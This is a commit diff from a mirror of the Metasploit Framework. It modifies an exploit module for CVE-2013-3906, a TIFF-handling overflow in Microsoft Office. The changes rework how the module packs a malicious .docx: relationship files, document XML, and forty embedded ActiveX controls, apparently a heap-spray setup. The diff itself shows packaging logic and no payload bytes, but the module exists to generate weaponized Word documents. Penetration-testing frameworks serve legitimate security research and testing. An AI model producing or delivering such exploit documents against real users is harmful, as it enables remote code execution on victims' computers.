infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Progress

bug/bundler_fix
sinn3r 2013-11-20 17:11:13 -06:00
parent 94e13a0b8a
commit e13e457d8f
1 changed files with 84 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

122
modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
View File

@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote
'ax:persistence' => "persistStorage",
'r:id' => rid,
'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
'xmlns:r' => "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
'xmlns:r' => @schema
}
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
@ -269,6 +269,22 @@ class Metasploit3 < Msf::Exploit::Remote
end
#
# Creates a _rels/.rels file
#
def init_rels(doc_xml, doc_props)
rels = []
rels << doc_xml
rels << doc_props
{
:fname => "_rels/.rels",
# The .rels generates the same format like make_doc_xml_reals, we'll just use that
:data => make_doc_xml_reals(rels.flatten)
}
end
#
# Creates a document.xml file
# @param pre_defs [Array]
@ -276,7 +292,7 @@ class Metasploit3 < Msf::Exploit::Remote
# @param tiff_file [Array]
# @return [String] XML document
#
def init_doc_xml(pre_defs, activex, tiff_file)
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
pre_defs.select { |e| chart_rids << e[:rid] }
@ -294,7 +310,7 @@ class Metasploit3 < Msf::Exploit::Remote
doc_attrs = {
'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006",
'xmlns:o' => "urn:schemas-microsoft-com:office:office",
'xmlns:r' => "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
'xmlns:r' => @schema,
'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math",
'xmlns:v' => "urn:schemas-microsoft-com:vml",
'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
@ -347,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote
xml.cNvGraphicFramePr
xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>"http://schemas.openxmlformats.org/officeDocument/2006/relationships"})
xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>@schema})
end
end
end
@ -362,7 +378,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
builder.to_xml
{
:rid => "rId#{last_rid.to_s}",
:type => "#{@schema}/officeDocument",
:fname => "word/document.xml",
:xml => builder.to_xml
}
end
#
@ -415,25 +436,35 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Pre-define some items that already exist in the data directory
# This is more for the document.xml.rels file
# Pre-define some items that will be used in .rels
#
def init_pre_defs
last_rid = 0
def init_doc_props(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "docProps/app.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/core-properties", :fname => "docProps/core.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/officeDocument", :fname => "word/document.xml"}
pre_defs = []
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}styles", :fname => "word/styles.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}settings", :fname => "word/settings.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}webSettings", :fname => "word/webSettings.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}theme", :fname => "word/theme/theme1.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart1.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart2.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart3.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart4.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart5.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart6.xml"}
return last_rid, items
end
return last_rid, pre_defs
#
# Pre-define some items that will be used in document.xml.rels
#
def init_doc_xml_rels_items(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/styles", :fname => "word/styles.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/settings", :fname => "word/settings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "word/webSettings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/theme", :fname => "word/theme/theme1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart2.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart3.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart4.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart5.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart6.xml"}
return last_rid, items
end
@ -443,7 +474,7 @@ class Metasploit3 < Msf::Exploit::Remote
def init_activex_files(last_rid)
activex = []
1.times do |i|
40.times do |i|
id = last_rid + i
last_rid = id
rid = "rId#{id.to_s}"
@ -464,14 +495,15 @@ class Metasploit3 < Msf::Exploit::Remote
}
ct = "application/vnd.ms-office.activeX+xml"
type = "#{@schema}control"
type = "#{@schema}/control"
activex << {
:rid => rid,
:bin => bin,
:xml => xml,
:rels => rels,
:content_type => ct
:content_type => ct,
:type => type
}
end
@ -498,12 +530,14 @@ class Metasploit3 < Msf::Exploit::Remote
# Creates the tiff file
#
def init_tiff_file(last_rid)
{
:rid => "rId#{(last_rid + 1).to_s}",
tiff_data = {
:rid => "rId#{(last_rid += 1).to_s}",
:fname => "word/media/image1.jpeg",
:data => make_tiff,
:type => "#{@schema}image"
:type => "#{@schema}/image"
}
return last_rid, tiff_data
end
#
@ -512,11 +546,11 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml_reals_file(pre_defs, activex, tiff)
reals = []
pre_defs.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
end
activex.each do |obj|
reals << {:id => obj[:rid], :tyoe => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
end
reals << {:id => tiff[:rid], :type => tiff[:type], :target => tiff[:fname].gsub(/^word\//, '')}
@ -542,12 +576,15 @@ class Metasploit3 < Msf::Exploit::Remote
#
def make_docx(path)
print_status("Initializing files...")
last_rid, pre_defs = init_pre_defs
last_rid, activex = init_activex_files(last_rid)
ct_xml_file = init_contenttype_xml_file(activex)
tiff_file = init_tiff_file(last_rid)
doc_xml_reals_file = init_doc_xml_reals_file(pre_defs, activex, tiff_file)
doc_xml = init_doc_xml(pre_defs, activex, tiff_file)
last_rid = 1
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
ct_xml_file = init_contenttype_xml_file(activex)
last_rid, tiff_file = init_tiff_file(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new
Dir["#{path}/**/**"].each do |file|
@ -557,8 +594,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Packing directory: #{p}")
zip.add_file(p)
else
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
# Avoid packing image1.jpeg because we'll load it separately
if file !~ /media\/image1\.jpeg/
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
end
end
end
@ -583,6 +623,12 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Packing file: #{tiff_file[:fname]}")
zip.add_file(tiff_file[:fname], tiff_file[:data])
print_status("Packing file: #{doc_xml[:fname]}")
zip.add_file(doc_xml[:fname], doc_xml[:xml])
print_status("Packing file: #{rels_xml[:fname]}")
zip.add_file(rels_xml[:fname], rels_xml[:data])
print_status("Packing file: #{doc_xml_reals_file[:fname]}")
zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
@ -590,7 +636,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
@schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
docx = make_docx(path)
file_create(docx)